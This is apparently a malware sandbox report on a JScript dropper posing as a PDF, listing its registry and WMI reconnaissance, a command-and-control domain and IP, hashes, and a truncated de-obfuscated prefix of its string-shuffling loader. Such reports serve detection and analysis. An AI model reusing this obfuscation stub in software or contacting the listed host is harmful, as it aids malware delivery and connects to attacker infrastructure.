Transactions_details_On_Hold_pdf.js
This report is generated from a file or URL submitted to this webservice on December 10th 2021 02:24:56 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.49.8 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior: Contacts 1 domain and 1 host.
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (1)

Network Related

Uses network protocols on unusual ports
- details: TCP traffic to 185.140.53.235 on port 8975
- source: Network Traffic
- relevance: 7/10
- ATT&CK ID: T1571

Suspicious Indicators (3)

External Systems

Detected Suricata Alert
- details: Detected alert "ET POLICY DNS Query to DynDNS Domain *.3utilities .com" (SID: 2028677, Rev: 1, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by at least three reputation engines
- details: 12/93 reputation engines marked "http://priidia.3utilities.com" as malicious (12% detection rate)
- source: External System
- relevance: 10/10

General

Executes a java script
- details: Process "WScript.exe" with commandline ""C:\Transactions_details_On_Hold_pdf.js""
- source: Monitored Target
- relevance: 10/10
- ATT&CK ID: T1059.007
Informative (14)

Environment Awareness

Contains ability to read software policies
- details:
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "TRANSPARENTENABLED")
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "SAFERFLAGS")
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "DEFAULTLEVEL")
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "LEVELS")
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "POLICYSCOPE")
  - "WScript.exe" (Path: "HKLM\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SAFER\CODEIDENTIFIERS"; Key: "LOGFILENAME")
- source: Registry Access
- relevance: 1/10
- ATT&CK ID: T1082

Executes WMI queries
- details:
  - "WScript.exe" issued a query "select * from win32_operatingsystem"
  - "WScript.exe" issued a query "Select * From Win32_OperatingSystem"
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1047

Reads the active computer name
- details: "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME"; Key: "COMPUTERNAME")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads the cryptographic machine GUID
- details: "WScript.exe" (Path: "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY"; Key: "MACHINEGUID")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1082

General

Contacts domains
- details: "priidia.3utilities.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details: "185.140.53.235:8975"
- source: Network Traffic
- relevance: 1/10

Overview of unique CLSIDs touched in registry
- details:
  - "WScript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\LOCALSERVER32")
  - "WScript.exe" touched "JScript Language" (Path: "HKCU\CLSID\{F414C260-6AC0-11CF-B6D1-00AA00BBBB58}\PROGID")
  - "WScript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}\PROGID")
  - "WScript.exe" touched "FileSystem Object" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\TREATAS")
  - "WScript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\PROGID")
  - "WScript.exe" touched "Shell Automation Service" (Path: "HKCU\CLSID\{13709620-C279-11CE-A49E-444553540000}\PROGID")
  - "WScript.exe" touched "Computer" (Path: "HKCU\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\SHELLFOLDER")
  - "WScript.exe" touched "Memory Mapped Cache Mgr" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\TREATAS")
  - "WScript.exe" touched "UsersFiles" (Path: "HKCU\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\SHELLFOLDER")
  - "WScript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\PROGID")
  - "WScript.exe" touched "WBEM Locator" (Path: "HKCU\WOW6432NODE\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\PROGID")
  - "WScript.exe" touched "WbemDefaultPathParser" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\PROGID")
  - "WScript.exe" touched "PSFactoryBuffer" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\INPROCHANDLER")
  - "WScript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\PROGID")
  - "WScript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\INPROCHANDLER32")
  - "WScript.exe" touched "Microsoft WBEM WbemClassObject Marshalling proxy" (Path: "HKCU\CLSID\{4590F812-1D3A-11D0-891F-00AA004B2E24}\INPROCSERVER32")
  - "WScript.exe" touched "WbemStatusCode" (Path: "HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\PROGID")
  - "WScript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\PROGID")
  - "WScript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\INPROCHANDLER")
  - "WScript.exe" touched "XML DOM Document" (Path: "HKLM\SOFTWARE\CLASSES\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
- source: Registry Access
- relevance: 3/10

Parsed Javascript
- details:
Output (readable prefix of the parsed script; the two long obfuscated string literals are omitted, and the report itself truncates the output inside the second one):

```js
var b, h, d, a, c, j, g, e, k, f;
(function() {
  var kvq = '',
    bpQ = 242 - 231;   // 11
  // Deterministic in-place shuffle of the characters of z: the swap indices are
  // derived from a constant seed, so the same input always yields the same
  // permutation. The script uses it to turn stored strings back into usable ones.
  function xED(z) {
    var t = 2335083;
    var i = z.length;
    var l = [];
    for (var m = 0; m < i; m++) {
      l[m] = z.charAt(m)
    };
    for (var m = 0; m < i; m++) {
      var a = t * (m + 148) + (t % 27477);
      var e = t * (m + 326) + (t % 12433);
      var f = a % i;
      var p = e % i;
      var r = l[f];
      l[f] = l[p];
      l[p] = r;
      t = (a + e) % 4197319;
    };
    return l.join('')
  };
  // The first 11 characters of the shuffled alphabet become a property name that is
  // looked up on the xED function object itself.
  var dWO = xED('auvssronqrutfljpxntcwkcgdoomictrbheyz').substr(0, bpQ);
  var ueD = '...';   // long obfuscated string literal omitted
  var MiX = xED[dWO];
  var qMP = '';
  var jaR = MiX;
  // MiX is invoked with an empty string and the de-shuffled ueD; its return value is
  // then invoked with a second de-shuffled literal.
  var ApP = MiX(qMP, xED(ueD));
  var XPm = ApP(xED('...   // second long obfuscated string literal omitted; the report's output is truncated here
```

- source: Static Parser
- relevance: 5/10

Reads Windows Trust Settings
- details: "WScript.exe" (Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WINTRUST\TRUST PROVIDERS\SOFTWARE PUBLISHING"; Key: "STATE")
- source: Registry Access
- relevance: 5/10
- ATT&CK ID: T1012

Reads configuration files
- details:
  - "WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\desktop.ini"
  - "WScript.exe" read file "%APPDATA%\Microsoft\Windows\Recent\desktop.ini"
  - "WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\desktop.ini"
  - "WScript.exe" read file "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini"
  - "WScript.exe" read file "%USERPROFILE%\Favorites\desktop.ini"
- source: API Call
- relevance: 4/10

Installation/Persistence

Touches files in the Windows directory
- details: "WScript.exe" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
- source: API Call
- relevance: 7/10

Network Related

Found potential URL in binary/memory
- details:
  - Heuristic match: "%.Cim%%t.WnBiB\/%.S.wAaYt4^kcNF.b0lutMdYulipd.cCdrcwnyt0qXu..BYSq^^XY6^ddf.csI8.jmp.i2xzi4\/bvk.7%Em.cdi%SWtk.tqYc.itC7Ckz%pSx.d.okio.kdb4dgqx5hNveecaBbdtc%ctModky%2kh%sQQ3%-Ip.oW4bm^o7m\/c%C%.3Ddoix5xi7.wc6.fr3S.3@%8m%Ya%k.o.ud9k.%^.oEomC.S)ni.Yh.%co.p\/Y"
  - Heuristic match: "priidia.3utilities.com"
- source: File/Memory
- relevance: 10/10

System Security

Creates or modifies windows services
- details: "WScript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112

Unusual Characteristics

Reads information about supported languages
- details:
  - "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN-US")
  - "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN-US")
  - "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\LOCALE"; Key: "00000409")
  - "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE"; Key: "EN")
  - "WScript.exe" (Path: "HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE"; Key: "EN")
- source: Registry Access
- relevance: 3/10
- ATT&CK ID: T1012
File Details
Transactions_details_On_Hold_pdf.js
- Filename
- Transactions_details_On_Hold_pdf.js
- Size
- 1.1MiB (1117940 bytes)
- Type
- script javascript
- Description
- ASCII text, with very long lines, with no line terminators
- Architecture
- WINDOWS
- SHA256
- 17ad4ee12e1999b47eade777f52ec00ab5521b2a882b9142979dec581bb3e124
- MD5
- d7350baacf50817833597553df692cb1
- SHA1
- ade6d660d835093471a443c82476c21733593b65
- ssdeep
- 24576:ABY4P0Yqxr6XN2SIR3AvUy9YI3p1eErDhm13JGABE:/4M7xr6d2HhAJHeWQ15GA+
Hybrid Analysis
Analysed 1 process in total (System Resource Monitor).
- WScript.exe "C:\Transactions_details_On_Hold_pdf.js" (PID: 2676)
Network Analysis
DNS Requests
Domain | Address | Registrar | Country
---|---|---|---
priidia.3utilities.com | 185.140.53.235 (TTL: 60) | TLDS LLC. d/b/a SRSPlus (Organization: No-IP.com; Name Server: NF1.NO-IP.COM; Creation Date: 1999-12-20T00:00:00) | Sweden
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details
---|---|---|---
185.140.53.235 | 8975/TCP | wscript.exe (PID: 2676) | Sweden
HTTP Traffic
No relevant HTTP requests were made.
Suricata Alerts
Event | Category | Description | SID
---|---|---|---
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677
local -> 8.8.8.8:53 (UDP) | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.3utilities .com | 2028677
Extracted Files
No significant files were extracted.
Notifications
Runtime
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Network whitenoise filtering was applied
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-6" are available in the report
- Not all sources for indicator ID "registry-72" are available in the report
- Some low-level data is hidden, as this is only a slim report